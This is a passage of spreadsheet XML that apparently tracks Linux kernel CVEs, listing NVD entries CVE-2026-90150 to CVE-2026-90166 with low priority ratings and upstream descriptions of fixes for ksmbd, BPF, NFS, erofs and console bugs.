then parse each child in turn.  If parsing a child fails, the failed child is
not counted in nr_children and the parent may be left with a children array
that bl_free_device() will not release when nr_children is zero.
Release the failed child and the already parsed children before returning the
error.  Also make bl_free_device() release the child array whenever the
children pointer is set, so that partially initialised concat or stripe
devices are cleaned up correctly.
bl_parse_scsi() can also fail after assigning d-&gt;bdev_file and dropping the
file reference.  Clear the pointer after fput() so that an outer cleanup path
does not put it again.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90150</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90151</t>
        </is>
      </c>
      <c r="D519" s="5" t="inlineStr"/>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="inlineStr"/>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr"/>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4: remove callback IDR entry on client allocation failure
nfs4_alloc_client() allocates an NFSv4.0 callback identifier before it
finishes setting up the client. If any later initialization step fails,
the error path frees the nfs_client directly with nfs_free_client(). That
bypasses nfs_put_client(), which is where the callback IDR entry is
removed during normal teardown.
A failed allocation can therefore leave cb_ident_idr pointing at a freed
nfs_client. A later NFSv4.0 callback lookup by cb_ident would find the
stale pointer and take a reference to it.
Make the callback IDR removal helper callable by the allocation failure
path, and remove the callback identifier before freeing the client.
This was found by a local static-analysis checker for publish-before-free
lifetime bugs and confirmed by manual inspection.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90151</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90152</t>
        </is>
      </c>
      <c r="D520" s="5" t="inlineStr"/>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="inlineStr"/>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr"/>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix session leak in ksmbd_session_register()
See the procedure below:
  smb2_sess_setup
    ksmbd_smb2_session_create
      __session_create
        atomic_set(&amp;sess-&gt;refcnt, 2)
        hash_add(sessions_table, &amp;sess-&gt;hlist, sess-&gt;id)
    ksmbd_session_register
      xa_store(&amp;conn-&gt;sessions, sess-&gt;id, sess) // fail
    ksmbd_user_session_put
      atomic_dec(&amp;sess-&gt;refcnt) // refcnt is 1, session is not freed
Remove the session from sessions_table and drop its table reference if
xa_store() fails.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90152</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90153</t>
        </is>
      </c>
      <c r="D521" s="5" t="inlineStr"/>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="inlineStr"/>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr"/>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: bound smb_check_perm_dacl() ACE walks by DACL size
smb_check_perm_dacl() validates that the DACL fits inside the NT
security descriptor, but then bounds its two ACE walks by the
remaining NTSD length (acl_size) rather than the DACL's declared
size (pdacl_size).
When pdacl-&gt;size is smaller than the trailing NTSD buffer, bytes
after the declared DACL boundary - still inside the stored security
descriptor - are parsed as ACEs during access checks.  A crafted
DACL can place an access-granting ACE beyond pdacl-&gt;size, and the
current code accepts it during SMB2_CREATE access validation, while
parse_dacl() and smb_inherit_dacl() stop at pdacl_size.
Bound both ACE walks by pdacl_size to match the DACL boundary
semantics used elsewhere in the server.
Validation:
- semantic KUnit harness shows the post-boundary ACE is selected
  before the fix and rejected (EACCES) after it
- linux master (7.2-rc6), x86_64</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90153</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90154</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2026-09-17</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr"/>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: scope session state changes to bound connections
ksmbd_all_conn_set_status() treats every connection whose transient
binding flag is set as belonging to the target SessionId.  A logoff or
session replacement can consequently move an unrelated connection to
NEED_RECONNECT or NEED_SETUP.
Pass the target session itself and select connections using either the
connection-local session xarray or the session's permanent channel list.
Use the same association test while waiting for requests to drain.
Serialize session-wide status changes under request_lock and do not
overwrite EXITING or RELEASING. Protect the shutdown transition with the
same lock so a concurrent session update cannot revive a closing
connection.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90154</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90155</t>
        </is>
      </c>
      <c r="D523" s="5" t="inlineStr"/>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="inlineStr"/>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr"/>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: detach blocked lock requests before freeing
A file_lock retained by ksmbd for byte-range lock bookkeeping can still
be part of the VFS blocked-request graph. In particular, the VFS can
chain a new waiter below an already blocked request through
flc_blocked_requests. The ksmbd_file reference count does not cover that
graph.
Both __ksmbd_close_fd() and the cross-request unlock path free these
retained file_lock objects directly. If a dependent waiter is still
attached, locks_release_private() hits
BUG_ON(!list_empty(&amp;flc-&gt;flc_blocked_requests)). The same lifetime
mismatch can leave a freed ksmbd_lock reachable through its request-local
llist.
Detach the file_lock from the blocked-request graph before freeing it in
the close, cross-request unlock, and rollback paths. locks_delete_block()
also wakes requests chained below the object. Remove llist when a
completed lock is published so a globally visible ksmbd_lock no longer
points into the submitting worker's stack.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90155</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90156</t>
        </is>
      </c>
      <c r="D524" s="5" t="inlineStr"/>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="inlineStr"/>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr"/>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely discard unregistered deferred locks
When vfs_lock_file() defers a lock, smb2_lock() puts its ksmbd_lock on
rollback_list before allocating and registering the asynchronous work.
If either operation fails, rollback assumes that smb_lock-&gt;conn is
initialized and dereferences NULL. The deferred file_lock also remains
linked into the VFS blocked-lock state while it is freed.
Keep the lock off rollback_list until async setup succeeds. On setup
failures, explicitly unblock and wake the deferred lock before freeing it
and its ksmbd wrapper.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90156</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90157</t>
        </is>
      </c>
      <c r="D525" s="5" t="inlineStr"/>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="inlineStr"/>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr"/>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject negative optlen in cgroup getsockopt hook
A cgroup getsockopt BPF program can shrink ctx-&gt;optlen after the
kernel getsockopt handler has run. The kernel-buffer variant, used by
TCP_ZEROCOPY_RECEIVE, only rejects values larger than the original
length.
If BPF writes a negative optlen, that value is accepted and propagated
back to the TCP getsockopt code. It can then be passed to
copy_to_sockptr() as a size_t and trigger the hardened usercopy
bytes &gt; INT_MAX warning.
Reject negative ctx.optlen in __cgroup_bpf_run_filter_getsockopt_kern(),
matching the lower-bound validation already present in the sockptr-based
getsockopt hook.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90157</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90158</t>
        </is>
      </c>
      <c r="D526" s="5" t="inlineStr"/>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="inlineStr"/>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr"/>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
m68k: nfcon: Do not call console_is_registered() in nfcon_device()
Since 7c2af0f634f1 ("tty: tty_io: use console_list_lock for list
synchronization") show_cons_active() calls the .device() method under
the console_list_lock, but console_is_registered() tries to acquire
console_list_lock as well, causing a deadlock.  It should not be
necessary to check console_is_registered() here since the function
should not be called in the fist place when the console is not
registered.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90158</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90159</t>
        </is>
      </c>
      <c r="D527" s="5" t="inlineStr"/>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="inlineStr"/>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr"/>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow bpf_{g,s}etsockopt() in cgroup UNIX getname hooks
_bpf_setsockopt() and _bpf_getsockopt() call sock_owned_by_me() for
full sockets, so these helpers expect the socket lock to be held.
BPF_CGROUP_UNIX_GETPEERNAME and BPF_CGROUP_UNIX_GETSOCKNAME run BPF
programs without acquiring the socket lock. A program attached to
either hook can therefore trigger the sock_owned_by_me() warning by
calling bpf_setsockopt() or bpf_getsockopt().
Disallow bpf_setsockopt() and bpf_getsockopt() for CGROUP_UNIX_GETPEERNAME
and CGROUP_UNIX_GETSOCKNAME.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90159</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90160</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2026-09-17</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr"/>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lwt_bpf: Restore reserved headroom after xmit program
ip_finish_output2() expands an skb to LL_RESERVED_SPACE(dev) before LWT
xmit. An LWT_XMIT BPF program can then modify the skb head and still
return BPF_OK, so bpf_xmit() rechecks the remaining headroom before the
skb continues to neighbour output.
That recheck uses dst-&gt;dev-&gt;hard_header_len. This is not enough for the
neighbour cached-header path: neigh_hh_output() copies the cached hardware
header using the aligned hh_cache size, HH_DATA_MOD for short headers or
HH_DATA_ALIGN(hh_len) otherwise.
On Ethernet, hard_header_len is 14 but the cached copy needs 16 bytes. If
an LWT_XMIT BPF program calls bpf_skb_change_head(skb, 1, 0), the skb can
still have 15 bytes of headroom after the program. The existing check
accepts that, after which neigh_hh_output() hits its headroom warning and
drops the skb.
Use LL_RESERVED_SPACE(dst-&gt;dev) in the post-BPF headroom check to match
the reservation made before LWT xmit.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90160</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90161</t>
        </is>
      </c>
      <c r="D529" s="5" t="inlineStr"/>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="inlineStr"/>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr"/>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: fix interlaced ztailpacking pclusters
On-disk sizes of interlaced pclusters should be block-aligned, and
ztailpacking interlaced pclusters should be invalid at all.
Currently, mkfs.erofs won't generate any interlaced pcluster with
ztailpacking enabled, so this doesn't affect any existing valid
filesystems.
However, crafted images can contain invalid interlaced ztailpacking
pclusters, resulting in an out-of-bounds read from a kmap'd page and
copying irrelevant kernel memory into userspace-visible page cache.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90161</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90162</t>
        </is>
      </c>
      <c r="D530" s="5" t="inlineStr"/>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="inlineStr"/>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr"/>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: defer publishing granted locks to prevent UAF/double-free race
In smb2_lock(), mid-batch granted locks are published to connection-wide
(conn-&gt;lock_list) and file-wide (fp-&gt;lock_list) lists immediately upon
vfs_lock_file() success, while also remaining tracked on the stack-local
rollback_list.
If a subsequent element in the same SMB2_LOCK request array fails
validation or execution, the thread jumps to out: and walks
rollback_list to undo previously granted locks. However, because the
granted lock was already published to conn-&gt;lock_list, a concurrent
UNLOCK request on the same connection can find the lock object and
kfree() it before the rollback loop executes.
When the granting thread subsequently walks rollback_list, it
dereferences and frees the already-freed ksmbd_lock structure, resulting
in a Use-After-Free and Double-Free (on both ksmbd_lock and struct
file_lock).
Fix this by deferring the publication of granted locks to
conn-&gt;lock_list and fp-&gt;lock_list until after the entire array of lock
elements has been processed without error. Mid-batch grants remain
tracked exclusively on the request-local rollback_list until the whole
batch succeeds, eliminating the race window.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90162</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90163</t>
        </is>
      </c>
      <c r="D531" s="5" t="inlineStr"/>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="inlineStr"/>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr"/>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: call ksmbd_proc_cleanup() on module init failure
When a later initializer fails, the unwind chain releases resources
created after procfs and then jumps directly to class_unregister().
Returning an error from module_init() leaves the proc tree and its
per-CPU counters allocated.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90163</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90164</t>
        </is>
      </c>
      <c r="D532" s="5" t="inlineStr"/>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="inlineStr"/>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr"/>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: abort initialization when proc setup fails
ksmbd_server_init() calls ksmbd_proc_init() before creating the
remaining proc entries and server subsystems. ksmbd_proc_init() tears
down partial state on a procfs or percpu_counter allocation failure,
but returns void, so ksmbd_server_init() continues as if the counters
were usable.
Once userspace starts the server, server_ctrl_handle_init() calls
ksmbd_proc_reset(), which reaches percpu_counter_set() with a NULL
per-CPU counters pointer on SMP systems. The later ksmbd_proc_create()
calls also receive a NULL parent and may create entries in the /proc
root; ksmbd_proc_cleanup() cannot remove those entries because
ksmbd_proc_fs is NULL.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90164</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90165</t>
        </is>
      </c>
      <c r="D533" s="5" t="inlineStr"/>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="inlineStr"/>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr"/>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix invalid pointer dereference in ksmbd_stop_durable_scavenger()
See the procedure below:
  ksmbd_launch_ksmbd_durable_scavenger
    durable_scavenger_running = true
    server_conf.dh_task = kthread_run() // fail, dh_task is an ERR_PTR()
  server_ctrl_handle_reset
    ksmbd_stop_durable_scavenger
    kthread_stop(server_conf.dh_task) // invalid pointer</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90165</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90166</t>
        </is>
      </c>
      <c r="D534" s="5" t="inlineStr"/>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="inlineStr"/>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
